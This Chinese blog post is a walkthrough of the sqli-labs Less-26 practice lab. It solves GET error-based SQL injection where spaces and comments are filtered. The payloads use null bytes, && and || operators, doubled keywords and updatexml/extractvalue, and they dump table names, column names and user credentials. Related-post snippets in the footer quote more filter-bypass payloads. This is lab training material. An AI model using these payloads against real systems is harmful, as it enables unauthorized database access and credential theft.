SQL-labs的第26关——空格和注释被过滤 报错注入(Get)

已于 2023-08-04 16:11:12 修改
阅读量577 收藏 3
点赞数 1
文章标签: sql 数据库
于 2023-08-04 15:55:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73393033/article/details/132106416
版权

1、判断闭合方式

输入语句

?id=1\;%00

,返回页面如下:

'号可能是闭合方式。

我们输入

?id=1';%00

,返回页面如下

我们可以确定'号就是该网站的闭合符号。

2、确定数据库名的长度

输入语句

?id=1'%26%26length(database())=8;%00

,返回页面如下:

3、爆破数据表名

输入语句

?id=1'||updatexml(1,concat('~',(select+(group_concat(table_name))from+(infoorrmation_schema.tables)+where+(table_schema=database())),'~'),1);%00

,返回页面如下:

4、爆破列名

输入语句

?id=1'%26%26extractvalue(1,concat('~',(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='users')aandnd(table_schema=database())),'~'));%00

,返回页面如下:

5、爆破字段内容

输入语句

?id=1'%26%26updatexml(1,concat('~',(select (group_concat(concat(id,'~',username,'~',password))) from (users)),'~'),1);%00

,返回页面如下:

我们发现返回的内容不完全,我们将语句改为:?

id=1'%26%26updatexml(1,concat('~',mid((select (group_concat(concat(id,'~',username,'~',passwoorrd))) from (users)),10,22),'~'),1);%00

,返回页面如下:

到此打靶结束

Hacker-小胖锅
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
sql注入空格过滤_SQL注入:各种绕过检测的姿势
weixin_39874589的博客
11-16 4179
这一篇主要总结一下sqlilabs中advanced injection中的用到的各种绕过,也就是less21-less38。目录1)数据编码2)特殊字符、语法键字过滤3)存储型注入4)特殊字符转义与宽字节注入5)防火墙保护与http参数污染数据编码http://111.231.88.117/sqli_lab/sqli-labs-php7/Less-21/ http://111.231.88.1...
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
CTF_ctfshow_web7_sql注入过滤空格
weixin_54227009的博客
05-14 459
打开靶机 打开每一个列表,发现有一个id,所以为get传参 ok,找一下注入点 -2/**/union/**/select/**/1,2,3# 这里发现过滤空格,所以直接用/**/代替空格进行绕过,发现回显点为2,3 下面开始查库吧! -2/**/union/**/select/**/1,database(),version();# 库名:web7 版本:10.3.18-MariaDB 查表: -2/**/union/**/select/**/1,gr...
sqllab第二十六笔记
最新发布
I_WORM的博客
03-16 359
构造payload:id='||extractvalue(1,concat(0x7e,database(),0x7e))='1。发现不行,了,换成其他的也不行(%0a %09 %0b %0c %0d %a0)想了半天没结果,不用空格的话没办法执行语句;看了别人的wp发现可以用||进行绕过。构造payload:id=’||exp(710)='1。好了,既然能够绕过入门规则了,下面就要开始获取数据了。构造payload:id=1'+oorr+1='1。构造payload:id='||1='1。
渗透之——SQL注入绕过技术总结
冰河的专栏
01-05 4604
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85869703 1.绕过空格注释符/* */,%a0) 两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/ 最基本的绕过方法,用注释替换空格: /* 注释 */ 使用...
sql注入空格过滤_SQL注入基础整理 - 11阳光
weixin_39867125的博客
10-21 1159
题记 本文转自 前言: 对已知的SQL注入手段作了较为全面和详尽的整理,大概是我几年的全部积累了,虽然可能有许多遗漏的地方,但我相信还是很有参考价值的。本文的注入场景为:一、基础注入 1.联合查询 即最常见的union注入:若前面的查询结果不为空,则返回两次查询的值:若前面的查询结果为空,则只返回union查询的值:查完数据库接下来就要查表名:' union selectgroup_c...
SQL注入一些过滤及绕过总结
热门推荐
weixin_44300286的博客
07-20 1万+
前言: 前几天做了几道SQL注入的题,一上去就遇到这样那样的过滤,弄得我很难受,所以这里写一篇过滤一些的总结。 1、过滤键字 过滤键字应该是最常见的过滤了,因为只要把键字一过滤,你的注入语句基本就不起作用了。 绕过方法: (1)最常用的绕过方法就是用/**/,<>,分割键字 sel<>ect sel/**/ect (2)根据过滤程度,有时候还可以用双写绕过 s...
sql注入绕过空格过滤
一只菜鸟的博客
10-31 6144
SQL注入时,空格的使用是非常普遍的。比如,我们使用union来取得目标数据: http://www.xxx.com/index.php?id=1 and 0 union select null,null,null 上面的语句,在and两侧、union两侧、select的两侧,都需要空格。 1. 注释绕过空格 这是最基本的方法,在一些自动化SQL注射工具中,使用也十分普遍。在MySQL中,用 /*注释*/ 来标记注释的内容。比如SQL查询: select user() from dual 我们用注释替换空格
SQL注入-过滤空格
qq_24899063的博客
11-08 1904
SQL注入-过滤空格
SQL注入(入门其二——过滤
qq_43520778的博客
09-06 1114
[toc]SQL注入
sqli-labs第21-28
永远相信美好的事情即将发生
02-11 1056
Less-21 先登进去看看,用户名admin,密码admin 根据前面的经验,我们尝试抓包看看 注意到有个cookie,并且经过了base64编码,于是猜测可能是cookie注入,但要base64编码,构造admin'(YWRtaW4n) 可以看到了,信息为:'admin'') LIMIT 0,1,其中有一个单引号是我们输入的,所以可以看出闭合方式为单引号加括号,构造admin')#(YWRtaW4nKSM=) 可以看到恢复正常了,接下来就可以尝试联合查询了,只不过构造的语句要base64
sql注入(三)绕过方法及防御手段
m0_63306943的博客
05-02 7602
1)如果 waf 过滤了逗号,并且只能盲注,在取子串的几个函数中,有一个替代逗号的方法就是使用 from for ,其中 pos 代表从 pos 个开始读取 len 长度的子串。rlike 模糊匹配,只要字段的值中存在要查找的 部分 就会被选择出来,用来取代 = 时,rlike 的用法和上面的 like 一样,没有通配符效果和 = 一样。因为这些sql命令的执行, 必须先的通过语法分析,生成执行计划,既然语法分析已经完成,已经预编译过了,那么后面输入的参数,是绝对不可能作为sql命令来执行的,
sql注入 自学笔记 注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 注入 二阶注入 布尔时间盲注 基于sqli-labs
sql-labs技巧
03-01
SQL注入常用靶场的通技巧
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
SQL注入(过滤空格和--+等注释符)
weixin_30335353的博客
09-10 2815
1、地址:http://ctf5.shiyanbar.com/web/index_2.php(过滤空格和--+等注释符) 思路:确定注入参数值类型,直接输入单引号,根据信息确定参数值类型为字符型,如下图所示。 2、正常思路输入' or '1'='1,直接,信息为SQLi detected!,首先猜测or被过滤,直接去掉or,继续输入' '1'='1, 仍然,信息为SQLi ...
sqli-labs/Less-26
m0_71299382的博客
11-20 1282
sqli-labs第二十六
sqlmap使用:过滤空格注入(手注)
NSQ0207的博客
07-21 367
1.查询数据库 2.查询表名 3.查询字段名 3/**/union/**/select/**/1,column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/=/**/'sozekgxoan'/**/and/**/table_schema=/**/"sqli"/**/limit/**/0,1 4.查询字段具体内容 3/**/union/**/select/**/1,grou
sql-labs第24二次注入
07-28
对于 SQL-Labs 第 24 的二次注入,你可以尝试以下步骤来完成任务: 1. 理解目标:首先,你需要了解任务的目标是什么。二次注入通常发生在用户输入被直接拼接到 SQL 查询语句中的情况。了解目标有助于你确定注入点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值